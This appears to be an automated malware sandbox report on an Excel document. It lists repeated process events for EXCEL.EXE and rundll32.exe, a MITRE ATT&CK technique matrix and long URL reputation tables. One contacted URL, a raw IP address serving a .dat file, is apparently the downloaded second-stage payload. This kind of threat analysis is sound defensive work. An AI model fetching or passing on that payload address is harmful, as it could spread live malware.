Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: rundll32.exe, 0000000B.00000002.766702302.0000000002EC0000.00000002.00000001.sdmp, rundll32.exe, 0000000C.00000002.760331792.00000000041A0000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.754136600.0000000003FE0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: rundll32.exe, 0000000B.00000002.766702302.0000000002EC0000.00000002.00000001.sdmp, rundll32.exe, 0000000C.00000002.760331792.00000000041A0000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.754136600.0000000003FE0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: rundll32.exe, 0000000B.00000002.766702302.0000000002EC0000.00000002.00000001.sdmp, rundll32.exe, 0000000C.00000002.760331792.00000000041A0000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.754136600.0000000003FE0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 0000000B.00000002.766702302.0000000002EC0000.00000002.00000001.sdmp, rundll32.exe, 0000000C.00000002.760331792.00000000041A0000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.754136600.0000000003FE0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting32Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution22Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting32LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
http://185.212.131.194/44285,5327891204.dat0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://185.212.131.194/44285,5327891204.datfalse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.com8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
    high
    https://login.microsoftonline.com/8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
      high
      https://shell.suite.office.com:14438774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
          high
          https://autodiscover-s.outlook.com/8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
              high
              https://cdn.entity.8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkey8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                    high
                    https://powerlift.acompli.net8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v18774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                      high
                      https://cortana.ai8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                high
                                https://api.aadrm.com/8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                      high
                                      https://cr.office.com8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControl8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/Office8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                            high
                                            https://graph.ppe.windows.net8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptionevents8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.net8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.com8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/work8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplate8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.com8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplate8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetect8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.ms8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groups8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                            high
                                                            https://graph.windows.net8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.com8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/api8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetect8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.json8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                        high
                                                                        https://ncus.contentsync.8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspx8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                    high
                                                                                    https://management.azure.com8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.com8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/ios8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmedia8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.com8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/Activities8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                high
                                                                                                https://api.office.net8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.com8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policies8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.com8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocation8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/log8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.com8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorize8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/imports8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.com8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                                                high
                                                                                                                                https://ncus.pagecontentsync.8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://augloop.office.com/v28774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://skyapi.live.net/Activity/8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/mac8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.com8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://api.cortana.ai8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://onedrive.live.com8774CB2F-B9EB-437C-9D99-9955AED5AE53.0.drfalse
                                                                                                                                              high
